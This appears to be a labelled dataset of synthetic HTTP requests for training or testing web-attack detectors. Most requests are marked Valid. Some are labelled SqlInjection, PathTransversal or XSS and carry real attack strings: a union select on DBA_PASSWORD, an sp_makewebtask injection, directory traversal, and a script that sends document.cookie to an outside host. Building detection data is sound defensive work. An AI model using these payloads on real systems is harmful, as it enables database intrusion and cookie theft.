X-Serial-Number: 5477334
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24884
Start - Id: 35154
class: SqlInjection
POST /https.m59MJ/ta2thfrs/urklA/e9ndPWsnMfyae5hzndyl/4-0xtGmQVGq/8-G4w_ba1dACfHzI@j/ty/stadthSn.cfm? HTTP/1.0
Content-Length: 142
Content-Language: cb6r,Rdi3aloT,a
Content-Encoding: compress
Content-Location: /rHe6/eoBote/anfatirm.swf
Content-MD5: OXRubmF0Z3V1NDFIYnNsYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 04 24:22:54 GMT
Last-Modified: Mon, 19 Mar 07 15:29:21 GMT
Host: 81.4.90.71
Connection: close
Accept: audio/*, application/zip;q=0.5, image/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.7
Accept-Language: Lt-8a;q=0.2, nowece-naeo, anFhfe-Eols, hN6t-n9a;q=0.1
Cache-Control: only-if-cached
Client-ip: 239.245.76.171
Cookie: xmriwS16ximac=ik4XwtKv;mrNGYnMo@a=oShome8hff>tx
Cookie2: $Version="7"
Date: Sun, 18 Nov 07 05:08:35 GMT
ETag: W/"GLS9viRxwtjaVSxkna"
Expect: eel5Noee
From: obasole@fadfesnt.cz
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Wed, 18 Feb 04 07:49:34 CET
If-Match: "BvTlhRmiEhwSvAAZVs"
If-None-Match: "TPRwrmjOEyMp@qFsx@iq"
If-Range: "8C0Af7r6zKkvRJKdo"
Max-Forwards: 31
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: Digest username="t66nbee"
Range: 19-,8448-508426,664-75850
Referer: http://www.eaestz.ch/igiasts/Iksfhtc/Preikx/xdAto.exe
TE: deflate
Trailer: Host
User-Agent: Mozilla/3.4 (Windows; U; WinNT 9.9; ln-sR; rv:1.5.6) Gecko/66410124
UA-CPU: StrongARM
UA-Disp: 2481,6599,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 8.3 253.233.155.37, 2.6 www.shotpagt.shtml
Transfer-Encoding: uBbxs; so5aezf5=6wWka4p
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
Warning: 795 202.58.110.230 "nyEakndeio" 
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 1589979747
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wreEehceyim=nntisi&tle=7zncsuElma&hus5eotE=sA4fdgw2h7&mtowh2hdhta0LGe='union  select  PASSWORD from   DBA_PASSWORD;--&wv=53974667&ZL2T=879

End - Id: 35154
Start - Id: 21739
class: Valid
GET /lxC0ZwJEi_5wFtI7.pl?6ogea=tKaBC&ocn2sfdao=ihtpassO&sli=itf&4EtHsvws=709 HTTP/1.1
Host: 126.242.209.76
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic, windows-1257;q=0.6, euc-kr;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 211.7.17.117
Cookie: tG7c_%uFYx=pahsbin+le+;2hsw=wg;exceoootti=oio%2B;RrpP36i0=ai
Cookie2: $Version="44"
Date: Thu, 04 Feb 10 22:48:20 UTC
ETag: "PqpR7XP5.GNrKwl-p@r"
Expect: 100-continue
From: at2de@7dsrmtpw.fr
If-Modified-Since: Fri, 19 Nov 04 16:40:18 UTC
If-Unmodified-Since: Mon, 26 Oct 09 03:16:43 CET
If-Match: *
If-None-Match: "Tu3XDouBwqEG9zMIahrK"
If-Range: *
Max-Forwards: 18
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: 0k9Twe twle=ds1o3ar
Authorization: Digest realm
Range: 2-286,124579-86667
Referer: /smks/Clryig/6wyeaq6.jsp
TE: gzip;q=0.9,gzip,gzip;q=0.0
Trailer: Trailer
User-Agent: ooea/4.9.7
UA-CPU: PowerPC
UA-Disp: 079,7856,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 632x3686
Via: 4.8 231.60.51.199
Transfer-Encoding: tertuE
Upgrade: eaw0U/0.9, r5loeg/6.1
Warning: 765 215.219.205.19:25695 "heeythtssiieDoGdrnm" 
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 21815
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21739
Start - Id: 6566
class: Valid
PUT /TnFn/aoqnXi6xztoemlwne.jsp? HTTP/1.1
Content-Length: 338
Content-Language: od
Content-Encoding: compress
Content-Location: http://www.Dmhg.net/ihf2jr/s9hT/T0yEs.pdf
Content-MD5: ZTRlZWVvOGFhbGFhc29lbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Aug 04 19:28:57 CET
Last-Modified: Sat, 14 Jun 08 23:36:30 UTC
Host: www.nsrE4bni.cz
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 64.41.220.78
Cookie: uryT5fmta1D=kor;snhrL4=33;CQMlE7sock_stream.=h4ea)cclts;Autoeoirnr=ppusTyes;SeohUvbae=tesAq;HgandIbrt=4362990
Cookie2: $Version="747"
Date: Fri, 19 May 06 21:27:37 CET
ETag: W/".ePF7Ozd0YxQLai7h"
Expect: 100-continue
From: r0ll@emEeoe.uk
If-Modified-Since: Thu, 21 Feb 08 06:23:46 CET
If-Unmodified-Since: Mon, 20 Apr 09 16:53:47 GMT
If-Match: *
If-None-Match: "Jx0F7owJUAmVW.6"
If-Range: *
Max-Forwards: 05
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM cnp3YW1pZHB0cmV3bTduMWVsbUVlSXJvMjhyc29heHdncmVleGF1ZWFpZTN0aWh0
Range: -45,964658-8
Referer: /hoiO/ht9o/mTsby3/oonhepe/nonnsaE.dll
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/7.9 (X11; U; SunOS sun4u 3.1; rn-j9; rv:2.7.6) Gecko/64450305
UA-CPU: StrongARM
UA-Disp: 7851,1243,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 778x0460
Via: FTP/0.2 www.otyntot.gif, asaCe/4.1 56.181.189.39:37, FTP/1.9 121.231.212.96:69
Transfer-Encoding: s8oqlE; nrXg55s=Aqcyep
Upgrade: p5a/1.7, bTrr5a/4.4
Warning: 348 218.19.108.198:5 "wtitAgHibhi9pEynzec" 
X-Forwarded-For: 177.82.104.120
X-Serial-Number: 552358
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hwEYjwu0tg=rfocivvBlb&UnElikeobjectokmqOL=rt$rscriptQstylet7 a&0n9=itheddmiaeka&C0I01LiRiu3L=hEteee&oem=n&kotyra6m9sbmsl=fJNRPZ&ottirewayhGe=libh7HGeTic&eyEv9NsinLebhhe= lNils2wR&REK_h=hhncgfaorj&E3hobsbfN6r=n-9Af&as=amteq6oh7Nn&h4eiWtsoioeie=tM+ eEtt ica9&hAiYgWhomey4=73gt=sD/rrhdn&ejhyopethwheey=ebahn&XQ_Nk6bgsoundstyle.OYw=39

End - Id: 6566
Start - Id: 32981
class: Valid
POST /aGMSN74SonLT7I-7/GxMQi0C2dxnullIbjE/YWq/te_JwdSNW87.php3? HTTP/1.1
Content-Length: 180
Content-Language: E5rwnte
Content-Encoding: deflate
Content-Location: http://www.4Ge7ehsm.cz/iRtyte/xurq1ilt/aAAe.cfm
Content-MD5: ZW9nc24yZW5vaWVyVGFpeA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Nov 07 20:53:04 GMT
Last-Modified: Thu, 23 Nov 06 07:43:11 UTC
Host: www.utnan.cz
Connection: keep-alive
Accept: application/rtf;q=0.0, text/xml
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 102.188.18.212
Cookie: Cjannnb3m=sMseeTatzdlhh;mmpghtn1Ae8in=2017;enwd=2991563540
Cookie2: $Version="812"
Date: Fri, 15 Jul 05 17:49:42 GMT
ETag: "EMmTTUQgw._4u3x1Bat"
Expect: 100-continue
From: t6wsJpha@AeasyEf.net
If-Modified-Since: Sun, 10 Jan 10 01:46:52 CET
If-Unmodified-Since: Sun, 02 Mar 08 03:33:27 GMT
If-Match: *
If-None-Match: "QXdltVl6Z4injmve9gS"
If-Range: Sun, 06 Mar 05 18:20:58 UTC
Max-Forwards: 0
MIME-Version: 9.1
Pragma: n1i=srtEnhsy
Proxy-Authorization: NTLM aG5lNUNlb2ViczBhZWF0MGxodHM1cmljZWFoR3dnbmVhc2NjbnlienB1d2Vv
Authorization: Basic bGlPSG50cWE6bnJlc24=
Range: -5326
Referer: /dwTxE/wdMi.cfm
TE: trailers,chunked;q=0.3,trailers
Trailer: Referer
User-Agent: tilqYdxuC
UA-CPU: MIPS
UA-Disp: 8787,462,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 596x2213
Via: 1.5 55.95.171.245, 4.5 174.32.219.68
Transfer-Encoding: deflate
Upgrade: w9s/7.1, 3ornaa/6.9, gutsa1/0.6, ilDi/2.2, imano/5.6
Warning: 960 www.dvr2eom.js:20 "esme5cmn4diad" 
X-Forwarded-For: 225.92.175.53
X-Serial-Number: 62410
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

thxUpl=840675&dibolKn6d=20554&qtnDdt1rtd=xDttlikec s&uIfiErnph-yOt=gOer3l&Lkrwn=303151742&nt=hphtdn&2connectcARhlikeCt=bk4snl&uix7lchhoi=txftp&Gpkghn=9560891&4j9Vdenmoe=H~norotbn

End - Id: 32981
Start - Id: 45147
class: PathTransversal
GET /../../? HTTP/1.0
Host: 144.167.238.92:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 117.16.100.183
Cookie: atetat=gihqy;c7eitysslr5=55;thdrxeqietarz=95;reanlli5=7lq9:a;eeeaerh7uE=8l|a;QehtaccesciWqxY=sdrgciy
Cookie2: $Version="1"
Date: Tue, 23 Sep 08 22:41:42 UTC
ETag: "0wSFCQ37o04lOpEZWe"
Expect: sIseObpe
From: swItt@yOenslihWe.de
If-Modified-Since: Thu, 09 Mar 06 06:29:40 CET
If-Unmodified-Since: Wed, 30 Aug 06 11:54:22 UTC
If-Match: *
If-None-Match: "eW9hicL@KKPn5hP"
If-Range: "0gcNNxmEKdNOKPe"
Max-Forwards: 871
Pragma: HhB='Teisth'
Proxy-Authorization: Basic b2U1UnFvOnlOZWVyc2E=
Authorization: Basic M2VuZWx3NDpFYWtIaQ==
Referer: /clAwaO/fakh97ia/agmIws/Saed.asmx
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/2.9 (Machintosh; U; PPC Mac OS X 7.8; 8a-ld; rv:7.7.1) Gecko/02519125
Via: HTTP/3.4 www.udeee.js, 3.0 www.eartphlt.html:68511
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
X-Forwarded-For: 249.70.128.210
----: ----------------------------

null

End - Id: 45147
Start - Id: 27753
class: Valid
GET /uDW1/szDH.hh8l2/bhl7ten/vCcVD0ubin/eesTzsd.cgi?eaf2tstdore=etr6a&rrEs=4ee&etrismNrIeang=w%25hrewdoo%3Eywr&hewy=00604016&wscriptBBnWWn-=%2F%3Fm&jiIZAHteyi=n%3A%3Eih%5Cnincludehyseni&FYV.jolA=%27etN&cenni=tDt4b+ltE+tl HTTP/1.0
Host: 8.181.3.122
Connection: trinifho
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 86.1.108.115
Cookie: Tlaeqrnri=9oeetegrm;rTss=liq4
Cookie2: $Version="05"
Date: Fri, 23 Jul 04 21:58:57 GMT
ETag: W/"OsO_4gRqc12bSOih"
Expect: 7Woa
From: tVrn@r51a5.net
If-Modified-Since: Fri, 20 Oct 06 14:09:16 GMT
If-Unmodified-Since: Sat, 22 Sep 07 22:14:08 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0709
MIME-Version: 2.1
Pragma: vrh=lsnameeo
Proxy-Authorization: Digest nonce
Authorization: NTLM Y3RlTmFlOWFpbHhyZGF1cnJieW5hSmh0b21oMWllbmlla2xvN2Y=
Range: 2-,339-73
Referer: http://www.ofncsr.ch/ahhto4u/vtaua3w/dkemgeNc/toinch/teol.cfm
TE: trailers
Trailer: Date
User-Agent: yneaeyaaew (smlSPBL)
UA-CPU: x86
UA-Disp: 158,739,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 483x5740
Via: 6.2 www.iwneDer.js, HTTP/9.1 96.3.125.203, 7.9 www.nEedwht.htm
Transfer-Encoding: annzhh; yRtaau=slrjn
Upgrade: xsg/9.5, Ritt/6.4, eboO/6.1, a1raeh/5.0
Warning: 677 11.109.58.216 "dsdgrmasohh" "Fri, 19 Jun 09 16:50:58 GMT"
X-Forwarded-For: 222.77.194.240
X-Serial-Number: 256698379
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27753
Start - Id: 5680
class: Valid
POST /rV.A/l5LVbh5.kInn_pb/uulte.htm? HTTP/1.1
Content-Length: 85
Content-Language: elmd5si
Content-Encoding: identity
Content-Location: /oeTd/ceiRt/ota3t.tiff
Content-MD5: ZXJlaHRvbGFiZHRub2lhbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Nov 07 18:24:27 CET
Last-Modified: Tue, 07 Oct 08 22:14:44 GMT
Host: 91.19.115.133:80
Connection: keep-alive
Accept: application/*, application/zip, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale=08429
Client-ip: 52.203.165.218
Cookie: l9unanNeiuhi0=noandn;srfvhit1ad=etogiq;dnttezecr=segErh8oy
Cookie2: $Version="1"
Date: Sat, 20 Oct 07 24:30:39 UTC
ETag: "gA-VXXIIO8mh8_lp"
Expect: pige=eph8;ttll6v
From: 6onsas@rsaEn.cz
If-Modified-Since: Sat, 29 Dec 07 24:45:54 UTC
If-Unmodified-Since: Thu, 23 Oct 08 03:08:50 GMT
If-Match: "aUZ1qzfIMy@o7mswACzU"
If-None-Match: *
If-Range: Mon, 10 Jan 05 21:07:50 CET
Max-Forwards: 0
MIME-Version: 8.0
Pragma: 8=uaG
Proxy-Authorization: 5emer ephane=n6oq
Authorization: Digest response="97BFaA43715eD41DAdeb6cd6C9b45cfA"
Range: -816900,24457-
Referer: http://t1het.net/3cSee9o7/sfbm9/chxe/pO45d/wncoif.swf
TE: trailers,trailers,gzip;q=0.5
Trailer: Accept-Encoding
User-Agent: etsaqU/4.2.7.6.7
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 327x1132
Via: HTTP/1.7 www.oeaa.css:8062, 9.7 2.233.118.90:54519, HTTP/8.0 www.T9sH.jpeg
Transfer-Encoding: vhniRm; ofpannue=uesk
Upgrade: tou/1.5, iievh/5.0, uedx/3.7
Warning: 162 253.233.234.60 "iILnb" "Mon, 07 Nov 05 13:32:13 UTC"
X-Forwarded-For: 33.1.105.183
X-Serial-Number: 7835393170
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

te=dXOXCyMT&il=ggnoechildrde esRns&nhngPr=et&ufhmefs7dlbs3v=s?&qsdivw_a=3kaf&you=50

End - Id: 5680
Start - Id: 32562
class: Valid
PUT /amvCooHtreIs/hwpthiAlontons1/sad/sasTya/s0p07UL0NTOdb1Lgpj/jeslu5oRlhouOTb/itbsorEanarnaxn/tY0jq0v-NbbbVC/qXeWEsT8Cn-_J.tiff? HTTP/1.1
Content-Length: 120
Content-Language: ihtta,3ooRdE
Content-Encoding: compress
Content-Location: http://leli.fr/oepwer/hA8sh/ex9xh.php4
Content-MD5: aW9zcnR0dG50ZnNkbU9ldA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 04 Mar 10 12:44:32 CET
Last-Modified: Wed, 14 Sep 05 04:51:28 GMT
Host: 155.196.218.220:646
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: n4qvcro-uiptwL
Cache-Control: no-cache
Cookie: wIml4@hghttp=1tayhsot]pblTa;Xkths062ac5ttol=gl.UYm;FlsbtaiHrf=seBaeh;rtaehe=852;fJ2It=6867
Cookie2: $Version="4"
Date: Sat, 27 Dec 08 01:39:23 GMT
ETag: W/"HMG8qPcBdLRycSd1BF"
Expect: 100-continue
If-Modified-Since: Thu, 06 Nov 08 19:16:18 GMT
If-Unmodified-Since: Tue, 07 Mar 06 23:44:32 GMT
If-Match: "zbRo5q2APDLmbxgsfFe"
If-None-Match: *
If-Range: Sun, 31 May 09 11:55:24 CET
Max-Forwards: 27
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: ver8pp eioenefh=Tspc
Authorization: emo9w taxite=eila
Range: -102,68655-9232
Referer: /gq04/eHir7hB.txt
TE: trailers
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 3.9; 5u-ay; rv:8.7.7) Gecko/02124496
UA-CPU: Sparc
UA-OS: Win98
Via: FTP/5.5 www.onen0he.htm, e5amA/6.3 www.tarTR.shtml
Transfer-Encoding: deflate
Upgrade: m2evrU/8.7, notr/2.9
Warning: 365 www.adrl.jpeg "nAii7axy" "Sat, 05 Apr 08 01:02:10 GMT"
X-Serial-Number: 52857704544063987023
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

Bo=rPy2QzvT7&oriarTeroseq=eteyameiottesih&dys=sEk_ZO&Eseteb=tr&ntiyo2=413810&iip4o9poleiuyrt=o4hosaEiltoe9&Neuei=sZX2nYv

End - Id: 32562
Start - Id: 24924
class: Valid
GET /r13beehtVu2lzxlYc.bin?ftr0bQ=hjUra9Cj&rTsLVmD=Nib2aHao&hsfYe=+erdopt%3BQ%7Cs&o3e=w1Az&--Vrc2perlvopen3=2317&2F@c27child-fromp=s8yalogn&eueuat=l-GA9GDWXw&wiwzemm1ucoRg=0dp%25o&eat1=NsxreSei&o41zi=in15enlo HTTP/1.1
Host: www.zh5te.net:7
Connection: hei6hs
Accept: */*;q=0.5
Accept-Charset: iso-8859-5;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: e-emd, fetea-Grndhk, omttN-hlPdee;q=0.4, m-hh
Cache-Control: max-age=3
Client-ip: 210.63.57.145
Cookie: _LIGPX=91675;nneekiiefvuc=4199788;shsymnhil9=neneucrb|q;5ih=0316
Cookie2: $Version="0"
Date: Tue, 18 Aug 09 20:48:45 CET
ETag: W/"94Jp1voaoqMA_sTF"
Expect: Oo1wtt
From: pwmfp9h@tptOa1oce.de
If-Modified-Since: Sat, 27 May 06 09:58:36 GMT
If-Unmodified-Since: Thu, 11 Jan 07 15:22:48 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 24 May 08 24:44:50 UTC
Max-Forwards: 3
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="nodeiar"
Authorization: Basic b3dyYTplcklkaGc=
Range: -47448,86125-296,-084
Referer: /ro76o/Gd9Ue3h/nUhm.mspx
TE: trailers
Trailer: If-Range
User-Agent: zeIhrIeeme5Ehrmln2r
UA-CPU: MIPS
UA-Disp: 899,4850,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8559x9210
Via: 0.6 112.255.105.165
Transfer-Encoding: cjcuh
Upgrade: siot/9.8, asU/6.6, srli/7.3
Warning: 612 www.dskecR.jpg:8674 "r2eeilfhshdeecbm" 
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 2466804840974150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24924
Start - Id: 15360
class: Valid
GET /rRo3rstu1CYdg/hloyd0rfuTtic1/o32RpMwLgkJs_E/BTPo/luc/wrhkbWtY2pF9MhN/971m/oeh9gir6at/tl4FB/eTes/oZDvrsPXp0.shtml?.Fla=ovYo-W.WI&bsz4rctaz=snAkai&tjr=8419882&i7MtsaoUadlc=mmsrdsdrIr&eFdmydqlht=rnc+%3Cuae&eeqez0F=iZ-kTG&rfhuef7a=fwUx99dax&ueieeeadbsfE=nFa186VHSTgt&Icpsjrpositionb1xCperl=%28&y.E9OC=9&r2t=157&ht9o=7349275669 HTTP/1.1
Host: www.ne40y.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: saopon7-ts;q=0.8
Cache-Control: ms=pBhd
Client-ip: 1.126.250.57
Cookie: Ethd=w3brcie3
Cookie2: $Version="437"
Date: Tue, 16 May 06 23:27:28 CET
ETag: W/"rpsSZWkJNUkV0RD9"
Expect: 100-continue
From: hemanaoa@nrqynnnt.uk
If-Modified-Since: Mon, 29 Oct 07 14:26:09 GMT
If-Unmodified-Since: Fri, 31 Dec 04 14:57:36 GMT
If-Match: *
If-None-Match: ".8OJTPD4dZU5BUYUcln"
If-Range: Mon, 12 Oct 09 02:53:55 UTC
Max-Forwards: 9
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM OGlndWVmdW5aZGZpbzRnZG5wbGlxYnJjYW5hbGFlc25pNXRy
Authorization: Basic YXJhZDpvZm5laGg3YQ==
Range: 75-,670-452322
Referer: http://eudenoH.it/iwtfiaN/ieno/taoE17.doc
TE: trailers
Trailer: TE
User-Agent: t0yoxs/4.8
UA-CPU: Sparc
UA-Disp: 4712,7583,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 065x683
Via: 8.1 165.193.248.83, 9.6 176.168.39.193:60758, 0.4 112.61.19.189
Transfer-Encoding: gzip
Upgrade: taal/5.1, qooc/0.7
Warning: 274 95.139.38.223:42 "fieptb" "Tue, 18 May 04 21:24:03 CET"
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 15360
Start - Id: 35069
class: SqlInjection
GET /rvUwN7BAbe_/ohd/to_81hM-BtVD4NxH/oditi/oclQx1ZTHhJ@Je5/aALiPA2Lg6QmZKZc7/e0qi/k9.nsf?laiTVnemsnn2ie=%27%3B+++EXEC+++master.dbo.sp_makewebtask++%27c%3A%5Cinetpub%5Cwwwroot%5Ctt.gif%27%2C+++++%27SELECT++++aEau+FROM++a5hepp++++WHERE+++++xtype%3D%27%27U%27%27%27&omThD7=othbsun%27 HTTP/1.0
Host: 54.9.158.62
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-10646-ucs-2;q=0.1, windows-874, gb2312;q=0.9
Accept-Encoding: gzip, compress;q=0.0
Accept-Language: etlsood-heo
Cache-Control: no-store
Cookie: et4to7os0pr=b1home;grmuhna=0;spsEdXIyunh=mJY.2hKYhLr-;xli8c=rt(elocation;2ics=419939;vczteuUn=hdjateiseumsor
Date: Sun, 06 Apr 08 02:56:22 GMT
ETag: W/"WyAF5zeDwrXpXGb"
Expect: 100-continue
If-Unmodified-Since: Tue, 14 Aug 07 22:17:14 UTC
If-Match: *
If-None-Match: *
If-Range: "6plkVz7DIMy2Sy-8vLe"
Max-Forwards: 5689
Pragma: no-cache
Proxy-Authorization: NTLM aWQ5MGNBYXNhcmdFZW1zdGlpdDJpN0EyZGxybGxpbmlTZQ==
Authorization: Digest cnonce="rhbdsa"
Referer: /FpmA/qd5e/gHewIas/rnkg.php3
User-Agent: Mozilla/2.5 (compatible; MSIE 9.8; Open BSD i586; el8sNwwe0c)
UA-CPU: Sparc
UA-OS: WinNT
UA-Pixels: 4353x581
Via: 3.8 19.239.68.151
X-Serial-Number: 074180308
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35069
Start - Id: 19474
class: Valid
GET /e1_FApOToixAnlj7x/fUvoObRRS_iVb/rtWy/iB3rVb-Cg-5_EtFf1LEL/t2rfatta4/e@d0fw2Q1XfDhXeoGXXh/aedewNb/q3Iotsa9E@_P9wZnH/.DbCg_3A/UjvsahE/rdvg1sp8ExuQbc7vgu.php4? HTTP/1.1
Host: 169.255.169.52
Connection: aNfa
Accept: video/*;q=0.1, image/*, application/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 62.192.235.97
Cookie: hpasswdEyUrY=odc0syelooeeboD;sTpsmnie=wrmhmI
Cookie2: $Version="08"
Date: Wed, 23 Feb 05 06:44:58 UTC
ETag: "0FCRjuLQmnFhCUZ"
Expect: Ota8itr=37su6o;yrhfelu=lEih
From: onnnAm1I@spE2Fe0rns.com
If-Modified-Since: Fri, 02 Dec 05 04:23:12 CET
If-Unmodified-Since: Thu, 12 May 05 19:01:05 UTC
If-Match: "XYAm6wUKVXvLYWWw"
If-None-Match: "nxRy9yxrfoXC5u.QwDz"
If-Range: Mon, 07 Mar 05 17:41:17 GMT
Max-Forwards: 84
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="xesato"
Authorization: Basic bnNnZGhubmI6c2Vhcg==
Range: -40334,71196-
Referer: http://www.ibaso.biz/7hes6c/Pjteoet/tiemcv/nten.cgi
TE: gzip;q=0.5,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: afolhues/9.1
UA-CPU: PowerPC
UA-Disp: 0034,521,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6480x436
Via: 5.6 www.PeobRud.js, ceciu/4.7 178.241.26.11:8778
Transfer-Encoding: identity
Upgrade: o1e/9.4, Io9c/9.8
Warning: 023 www.yttU5rcS.png "umpoHgenaihro" "Mon, 28 Mar 05 07:12:11 UTC"
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 248225
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19474
Start - Id: 47405
class: XSS
GET /9x4o7ogotceirieehlHH/tx5/tb50olPul8UTb/lsLuXLmmocha2nXiB/hPOjFThmy41qS-38/dHdq9OPyLTFNUWF.shtml?ewuh6ezxwaedr6i=%3Ca++href++++%3D+%22++about%3A%3Cs%26%2399%3Bript+%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ilro.com%2Fcgi-bin%2Fni.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E+++++%22%3E&e99aueoeehhdiro=uC&tE9lgac=896&mdzLch=0046227&coe8@=5955 HTTP/1.1
Host: 18.77.101.242
Connection: fsams
Accept: */*
Accept-Charset: hz-gb-2312, hz-gb-2312;q=0.0, windows-1250, iso-8859-5;q=0.0, windows-1254
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="57"
Date: Mon, 22 Feb 10 24:23:23 UTC
ETag: "xslHmXI@16wFajcv"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Mon, 10 May 04 01:17:50 UTC
If-Unmodified-Since: Sat, 24 Jan 09 19:05:12 GMT
If-Match: *
If-None-Match: "Jcoz8eEx4bFjMYp"
If-Range: "@pFRKzKrzO_2S8vN"
Max-Forwards: 0
MIME-Version: 0.3
Pragma: tziO=et
Proxy-Authorization: Basic ZW5jU3JiaTpwQWFvcmU=
Authorization: Basic ZWVpbzpDSGt6N3R0aw==
Range: 3529-807061,329-36,-0646
Referer: http://e1hirl.org/mtOduzna/nutyet/ayrs.php3
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/8.6 (compatible; MSIE 6.7; Windows NT; ca2nsep; tig0dtn2e)
UA-CPU: StrongARM
UA-Disp: 815,562,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1670x058
Via: thtrtm/3.6 103.127.64.240
Transfer-Encoding: identity
Upgrade: sEtli/1.4, eqt/6.4, eixu/1.5
Warning: 420 47.114.190.11 "tisyat2nhQero" 
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 981746915
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47405
Start - Id: 27069
class: Valid
GET /ESNteErl/yJmdnetcatk/eO9Cq9JOmVx-uk23/tEC7LElsj/nVuHcw/lveGS/Nirtt1sxsoh6atsw/i8e/S2uleenouus6rxcb8.css?d7rnhMyu=5oAyBQ6_lb2F&tmgqhNriirU=45&cmdascriptZfSIASAS4=CSS&nh1sLpol5e=soZS5eTzi4l0&hQ7cat=oIwsnssboot.inie&yckmfgXqgssEt=iIS7ZnYjsC&eeemiynrtz=3796&XJevalBG3metaDTr=n3ps0 HTTP/1.1
Host: 161.180.212.64
Connection: dtcdn9n
Accept: audio/*;q=0.0
Accept-Charset: iso-2022-jp;q=0.4, iso-8859-8-i, x-mac-greek;q=0.0, koi8-r;q=0.4, x-mac-arabic;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: q='ssesa0a'
Client-ip: 247.155.95.247
Cookie: sptaz=u57DiLhw;dhd7n=690
Cookie2: $Version="764"
Date: Sat, 12 Aug 06 05:24:21 CET
ETag: "V8DY8gKc@gCxffLq"
